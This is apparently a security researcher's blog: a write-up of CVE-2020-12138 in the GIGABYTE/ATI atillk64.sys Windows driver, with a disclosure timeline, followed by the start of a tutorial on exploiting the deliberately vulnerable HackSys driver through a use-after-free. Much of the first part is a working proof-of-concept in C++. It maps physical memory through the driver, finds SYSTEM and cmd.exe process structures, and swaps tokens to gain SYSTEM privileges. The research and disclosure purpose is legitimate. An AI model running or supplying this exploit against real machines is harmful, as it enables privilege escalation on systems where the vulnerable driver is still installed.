Reversing the driver was pretty easy even as a complete novice just because it is so small. There is the hardly any surface area to explore and the IOCTL handler routine was pretty straightforward. MmMapIoSpace was one of the imports so I was already interested at this point.

One routine caught my attention early on because the API call chain was very similar to one of the driver routines that @ihack4falafel wrote up a proof-of-concept for.

The routine first calls MmMapIoSpace, which takes a physical address as a parameter and a length (and cache type) and maps that memory into system memory and returns a pointer to the now virtual address that corresponds to the beginning of the physical memory you asked to be mapped. So at this point, this system address is not available to us as a userland process. It is stored in rax and the result is checked to make sure the API call succeeded and did not return NULL. After some experimentation, as long as we pass a check that our input buffer is 0x18 in length, we are able to completely control two of the MmMapIoSpace parameters: NumberOfBytes and PhysicalAddress. These values are taken from rdi offsets which is the address of our input buffer. CacheType is hardcoded as 0.

If the call succeeded, a call is made to IoAllocateMdl with the same values. The virtual address returned by MmMapIoSpace is given as a parameter as well as the same Length value. This API also associates our newly created MDL with an IRP.

If the call succeeded, a subsequent call is made to MmBuildMdlForNonPagedPool which takes the MDL we just created and ‘updates it to describe the underlying physical pages.’ MSDN states that IoAllocateMdl doesn’t initialize the data array that follows the MDL structure, and that drivers should call MmBuildMdlForNonPagedPool to initialize the array and describe the physical memory in which the buffer resides.

Next, is a call to MmMapLockedPages, which is an old an deprecated API. This call takes the updated MDL and maps the physical pages that are described by it into our process space. It returns the starting address of this mapping to us eventually you’ll see as the return value (rax) is eventually placed in rbx and moved to [rdi] which will be our output buffer in DeviceIoControl.

Subsequent API calls to IoFreeMdl and MmUnmapIoSpace perform some cleanup and free up the pool allocations (as far as I know, please correct me if I’m wrong).

Exploitation Strategy

The first 8 bytes of our output buffer at this point hold a pointer to the mapped memory in our process space.

Say we mapped 0x1000 bytes from physical address offset 0x100000000 all of the data from 0x100000000 to 0x100001000 would be available to us within our process space. This is bad because we are a low-privileged process and this data can contain arbitrary system/privileged data.

The strategy for exploiting this was heavily informed by FuzzySec’s approach to exploiting his aforementioned Razer driver. At a high-level we are going to:

  • map physical memory into our process space,
  • parse through the data looking for “Proc” pool tags,
  • identify our calling process (typically cmd.exe) and note the location of our security token,
  • identify a process typically running as SYSTEM (something like lsass.exe) and note the value of its security token,
  • and finally, overwrite our token with the SYSTEM process token value to gain nt authority/system.

“Proc” Tags in the Pool

Following along with FuzzySec’s strategy here, the first thing we need to do is identify what these data structures actually look like in the pool. There will be pool chunk header and then a tag prepended to each pool allocation. The tag we’ll be looking for in our mapped memory is “Proc”, which is 0x636f7250 as an integer value.

To find some examples, we can use the kd !poolfind "Proc" command to identify pool allocations with our tag.

Looking at the output, we see we started scanning large pool allocations for the tag. I quit the process after 5 minutes or so as this should be enough sample data.

Scanning large pool allocation table for tag 0x636f7250 (Proc) (ffffd48c9d250000 : ffffd48c9d550000)

ffffd48ca040f340 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca10bd380 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca53b83e0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca21c60b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cb36e6410 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca09533b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca08c8310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9bfd40c0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9e59d310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9fce0310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca150f400 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cae7de390 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca0ddc330 : tag Proc, size     0xb70, Nonpaged pool

Just plugging in the first address there in the WinDBG Preview memory pane, we can see that from this address, if we subtract 0x10 and then add 0x4, we see our “Proc” tag.

kd> da ffffd48ca040f340-0x10+0x4
ffffd48c`a040f334  "[email protected]"

So we’ve identified a “Proc” pool allocation and we have a good idea of how they are allocated. As b33f explains, they are all 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a “Proc” tag might be.

So the first strategy we’ll employ in parsing for data we’re interested in, is to start at our mapped address and iterate by 0x10 each time and checking the value of our address + 0x4 for “Proc”.

From here, we can appeal to the EPROCESS structure to find the hardcoded offsets to EPROCESS members we’re interested in, which are going to be:

  • ImageFileName (the name of the process),
  • UniqueProcessId, and
  • Token.

I did all my testing on Windows 10 build 18362 and these were the offsets:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

So we can see that from the address that would normally be given to us if we did a !poolfind search for “Proc”, it is

  • 0x2e8 to the UniqueProcessId,
  • 0x360 to the Token, and
  • 0x450 to the ImageFileName.

So in our minds right now, our allocations look like this (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

The problem I found was that process to process, the size of these structures in between our “Proc” address and the point where our EPROCESS structure begins was wildly varied. Sometimes they were 0x20 in size, sometimes up to 0x90 during my testing. So right now my understanding of these allocations looks something like this:

if <0x10-aligned address> + 0x4 == "Proc"

then <0x10-aligned address> + <some intermediate structure size(somewhere between 0x20 and 0x90 typically)> == <beginning of EPROCESS>

then <beginning of EPROCESS> + 0x2e8 == UniqueProcessId
then <beginning of EPROCESS> + 0x360 == Token
then <beginning of EPROCESS> + 0x450 == ImageFileName

So my code had to account for these varying, let’s just call them “headers” informally for now, sizes. I noticed that all of these “header” structures ended with a 4-byte marker value of 0x00B80003. So what my code would now do is,

  • find “Proc” by looking at 0x10-aligned addresses and looking at the 4-byte value at +0x4,
  • once found, iterate 0x10 at a time up to offset 0xA0 (since the largest header size I found was 0x90) looking for 0x00B80003,
  • take the location of “Proc” and add it to a vector,
  • take the offset to 0x00B80003 and add it to a vector since we need to know this “header” size to calculate our way to the EPROCESS members we’re interested in.

So now that we have both the location of a “Proc” and the size of the header, we can accurately get UniqueProcessId, Token, and ImageFileName values.

  • (“Proc” - 0x4) + header-size + 0x2e8 = UniqueProcessId,
  • (“Proc” - 0x4) + header-size + 0x360 = Token,
  • (“Proc” - 0x4) + header-size + 0x450 = UniqueProcessId.

As an example, take this “Proc” tag found by !poolfind:

FFFFD48C`B102D320  00 00 B8 02 50 72 6F 63 39 B0 0D A6 8C D4 FF FF  ....Proc9.......
FFFFD48C`B102D330  00 10 00 00 88 0A 00 00 48 00 00 00 FF E8 2E F6  ........H.......
FFFFD48C`B102D340  C0 D4 66 2F 05 F8 FF FF 24 F6 FF FF E8 1F F6 FF  ..f/....$.......
FFFFD48C`B102D350  4A 7F 03 00 00 00 00 00 07 00 00 00 00 00 00 00  J...............
FFFFD48C`B102D360  00 00 00 00 00 00 00 00 93 00 08 00 F6 FF FF E8  ................
FFFFD48C`B102D370  C0 D4 66 2F 05 F8 FF FF 6B 85 EE 27 0F E6 FF FF  ..f/....k..'....
FFFFD48C`B102D380  03 00 B8 00 00 00 00 00 A0 04 0D A2 8C D4 FF FF  ................

We can see that 0xFFFFD48CB102D320 - 0x4 is “Proc”. Our header marker 0x00B80003, denoting when the header ends, is at offset 0x60 from there. We can test that we can find the ImageFileName given this information as follows:

kd> da 0xFFFFD48CB102D320 + 0x60 + 0x450
ffffd48c`b102d7d0  "svchost.exe"

So this looks promising.

Implementing Strategy in Code

One difficulty I faced on my Windows 10 build was that mapping large chunks at a time with DeviceIoControl calling our driver routine would often result in crashes. I didn’t have this problem at all on Windows 7. In my Windows 7 exploit I was able to map a 0x4CCCCCCC byte chunk and parse through the entire thing looking for the values I was after.

On Windows 10, I found the most stable approach to be to map 0x1000 (small page-sized) chunks at a time and then parse through these mapped chunks for my values. If I didn’t find my values, I would map another 0x1000. This too wasn’t crash free. I found that if I made too many mappings I would also crash so I had to find a sweet spot.

I also found that some calls to the driver routine with DeviceIoControl would return a failure. I wasn’t able to completely figure this out but my suspicion is that since our CacheType is hardcoded for us with MmMapIoSpace, if we tried to map pages that had been given a different CacheType in a previous mapping to a virtual address, it would fail. (Does this make sense?)

Picking a physical address to start mapping from is kind of arbitrary but I found the sweet spot on my Windows 10 VM to be around 0x200000000. This VM has about 8 GB of RAM. To limit the amount of mappings, I set a hard cap at 0x240000000 so that my exploit would stop mapping once it hit this address. I also toyed around with adding a limit to the amount of times DeviceIoControl is called but the exploit seems stable enough in testing that this wasn’t necessary in the end.

I used two main functions, the first function maps memory iteratively looking to identify the physical addresses of of “Proc” tags that have our “header marker” value soon after. This function stores the address of each physical location, the size of the header offset, and the size of the offset from the beginning of the memory page to the “Proc” location. It stores all of these values in vectors which are the sole members of a struct which the function returns. The offset to the beginning of the page is simply calculated with a modulus operation and then the remainder is subtracted from the “Proc” location. I wanted to make sure I was always mapping from a nice 0x1000 aligned address. Here is some of that snipped code:

cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
        if (DeviceIoControl(
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                            // We found a "header", this is a legit "Proc"

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;
                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
            // DeviceIoControl failed
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of two vectors, one holds Proc chunk address
    // one holds header-size for that Proc chunk.
    return proc_data;

The next function takes the returned proc_data struct and re-maps 0x1000 bytes of physical memory starting at the physical memory address of the “Proc” tag (-0x4) but from the beginning of that page. The largest header length I found being 0x90, and the largest offset of interest being 0x450, we definitely don’t need to map this much from this address but I found that mapping anything less would sporadically lead to crashes as it wouldn’t be perfectly page-aligned.

The function knows the “Proc” tag location, the header size, and the offsets for valuable EPROCESS members and goes looking for any likely to be SYSTEM process as defined in a global vector.

vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe

If it finds one of these processes and our cmd.exe process it will overwrite the cmd.exe Token with the Token value of a privileged process giving us an nt authority\system shell.

INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(

    for (int i = 0; i < proc_data.proc_address.size(); i++)
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // memebers ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            if (sys_result != 0 and SYSTEM_found == false)
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            //DeviceIoControl failed
    if ((!cmd_token_addr) or (!SYSTEM_token))
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";

As you can see, if we don’t find both a SYSTEM process and our cmd.exe process, the program exits without doing anything. This wasn’t often the case whenever the test machine was left running for at least 2-3 minutes after booting.

Searching for 100 process allocations in the pool is somewhat aggressive. The program will exit if it doesn’t find this many before bumping into the hard cap. Keep in mind that it doesn’t start parsing for the EPROCESS data until it has collected 100 “Proc” tag locations. This could mean that the program exits having already identified the relevant process chunks needed to elevate privileges.

This number can be toned down and the exploit could be trivially tweaked to search very small sections of physical memory at a time before exiting, annotating along the way and printing any valuable EPROCESS structure information to the terminal as it progresses. It could for instance be tweaked to search n amount of physical memory, output the location and token values of any privileged process or the cmd.exe process, and then exit while specifying the last memory address that it mapped. You could then start the exploit up again but this time specify the new last memory address mapped and map n from there and repeat until you had everything you needed.

The hardest part was finding the cmd.exe process. Likely-to-be-SYSTEM processes were easy to find. If you have a remote-desktop/GUI equivalent access to the host machine, you could open a few cmd.exe processes and greatly improve your odds of finding one to overwrite and elevate privileges.

Even with just one cmd.exe process, I was able to find and overwrite my token roughly 90% of the time. With more than one, it was 100% in my testing.

There are some improvements that can be made to the exploit no doubt, but as is, it works really well in my testing and can be tweaked fairly easily. I believe it sufficiently proves the vulnerability.

Mandatory screenshot:

Huge Thanks

Huge thanks to @FuzzySecurity for all of the tutorials, I’ve recently also finished up his HEVD exploit tutorials and have learned a ton from his blog. Just an awesome resource.

Thanks to @HackSysTeam for the HackSysExtremeVulnerable driver, it has been such a great learning resource and got me started down this path.

Thanks to both @ihack4falafel and @ilove2pwn_ for answering all of my questions along the way or helping me find the answers myself. Very grateful.

Thanks to @TheColonial for his advice about disclosure and his awesome CAPCOM.SYS YouTube video series. I learned a lot of nice WinDBG tricks from this.

Thanks again to @jessemichael for being so helpful and charitable.

Thanks to Jackson T. for not only his blog post but for answering all my questions and being extremely helpful, really appreciate it.

And finally thanks to all those cited blog authors @rwfpl and @hatRiot.

All testing performed on Build 18362.19h1_release.190318-1202.

Please, let me know if you find any errors.

Disclosure Timeline

  • February 25th 2020 – Email, Customer Service Ticket, and Twitter DM sent to GIGABYTE USA
  • February 26th 2020 – Email to AMD [email protected] notification of vulnerability found and PoC created
  • February 26th 2020 – Response from psirt to send PoC
  • February 26th 2020 – PoC sent to psirt
  • March 7th 2020 – Ask for update from psirt, no update given
  • March 16th 2020 – Ask for update from psirt
  • March 16th 2020 – psirt responds that the issue has been previously reported and that they don’t support the product as a result
  • March 16th 2020 – I inform psirt that other parties are still packaging and installing the driver and there is no advisory for the driver
  • March 24th 2020 – psirt states that support for the driver ended in late 2019 and to contact GIGABYTE directly
  • April 14th 2020 – No response from GIGABYTE USA, request CVE
  • April 24th 2020 – Assigned CVE-2020-12138, blog posted

Exploit Code

// CVE-2020-12138
// EOP Exploit POC for atillk64.sys by @h0mbre_
// C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys
// Driver vulnerability referenced in: 

#include <iostream>
#include <vector>
#include <algorithm>
#include <Windows.h>
#include "h0mbre.h"
using namespace std;

#define DEVICE_NAME         "\\\\.\\atillk64"
#define IOCTL               0x9C402564
#define START_ADDRESS       (INT64)0x200000000   // based off testing my VM
#define MAX_ADDRESS         (INT64)0x240000000   // based off testing my VM

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe

// Creating struct for our input buffer to DeviceIoControl
typedef struct {
    INT64 start_address;
    DWORDLONG num_of_bytes;
    DWORDLONG padding;

// This struct will hold the address of a "Proc" tag and that Proc chunk's 
// header size
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;

// Grabs handle to atillk64.sys
HANDLE get_handle(const char* device_name) {
    HANDLE hFile = CreateFileA(

    if (hFile == INVALID_HANDLE_VALUE)
        cout << "[!] Unable to grab handle to atillk64.sys.\n";
        string hex_output = pretty_hex((int)hFile);
        cout << "[>] Successfully grabbed handle to atillk64.sys: "
            << hex_output << "\n";

        return hFile;

// Mapping memory from a physical address to our process virtual space
PROC_DATA map_memory(HANDLE device_handle) {

    LPVOID output_buff = VirtualAlloc(

    string hex_output = pretty_hex((int)output_buff);
    cout << "[>] Output buffer allocated at: " << hex_output << ".\n";

    DWORD bytes_returned = 0;

    PROC_DATA proc_data;

    // failures == unsucessful DeviceIoControl calls
    int failures = 0;

    // How many legitamate "Proc" chunks we've found in memory as in
    // we've confirmed they have headers.
    int proc_count = 0;
    int iteration = 0;
    cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
        if (DeviceIoControl(
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                            // We found a "header", this is a legit "Proc"

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;

                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;

                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
            // DeviceIoControl failed
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of two vectors, one holds Proc chunk address
    // one holds header-size for that Proc chunk.
    return proc_data;

void parse_procs(HANDLE device_handle, struct PROC_DATA proc_data) {

    INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(

    for (int i = 0; i < proc_data.proc_address.size(); i++)
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // memebers ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            if (sys_result != 0 and SYSTEM_found == false)
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            //DeviceIoControl failed
    if ((!cmd_token_addr) or (!SYSTEM_token))
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";

void ascii() {

    cout << "\n\n\t     CVE-2020-12138 Proof-of-Concept\n";
    cout << "\t   EOP in ATI Technologies atillk64.sys\n\n";
    cout << "\t\t\t       by @h0mbre_\n\n\n";

int main() {


    // Grab handle to our device driver atillk64.sys
    HANDLE hFile = get_handle(DEVICE_NAME);

    // Return a pointer to our output buffer
    PROC_DATA proc_data = map_memory(hFile);

    // Look through our PROC_DATA struct for the values we need, ie EPROCESS
    // members for the processes we're interested in
    parse_procs(hFile, proc_data);

HEVD Exploits – Windows 7 x86 Use-After-Free

By: h0mbre
23 April 2020 at 04:00


Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.


UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this excercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like although we have to utilize multiple functions via IOCTL, this is actually a more simple exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, it seems like after doing this excercise we need to be able to do the following:

  • allocate an object in the non-paged pool,
  • a mechansim that creates a reference to the object as a global variable, ie if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
  • the ability to free the memory and not have the previously established reference NULLed out, ie when the chunk is freed the program author doesn’t specify that the reference=NULL,
  • the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
  • the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
  • finally, the ability to use the no-longer valid reference to our freed chunk.

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,

int main() {

    HANDLE hFile = grab_handle();


    return 0;

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi, this is about where I’ve placed the breakpoint, we can then take the value in esi which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as waht appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we have to account also for the pool header, so our real allocation size in the pool is 0x60 bytes.

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters except for the first DWORD value has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.

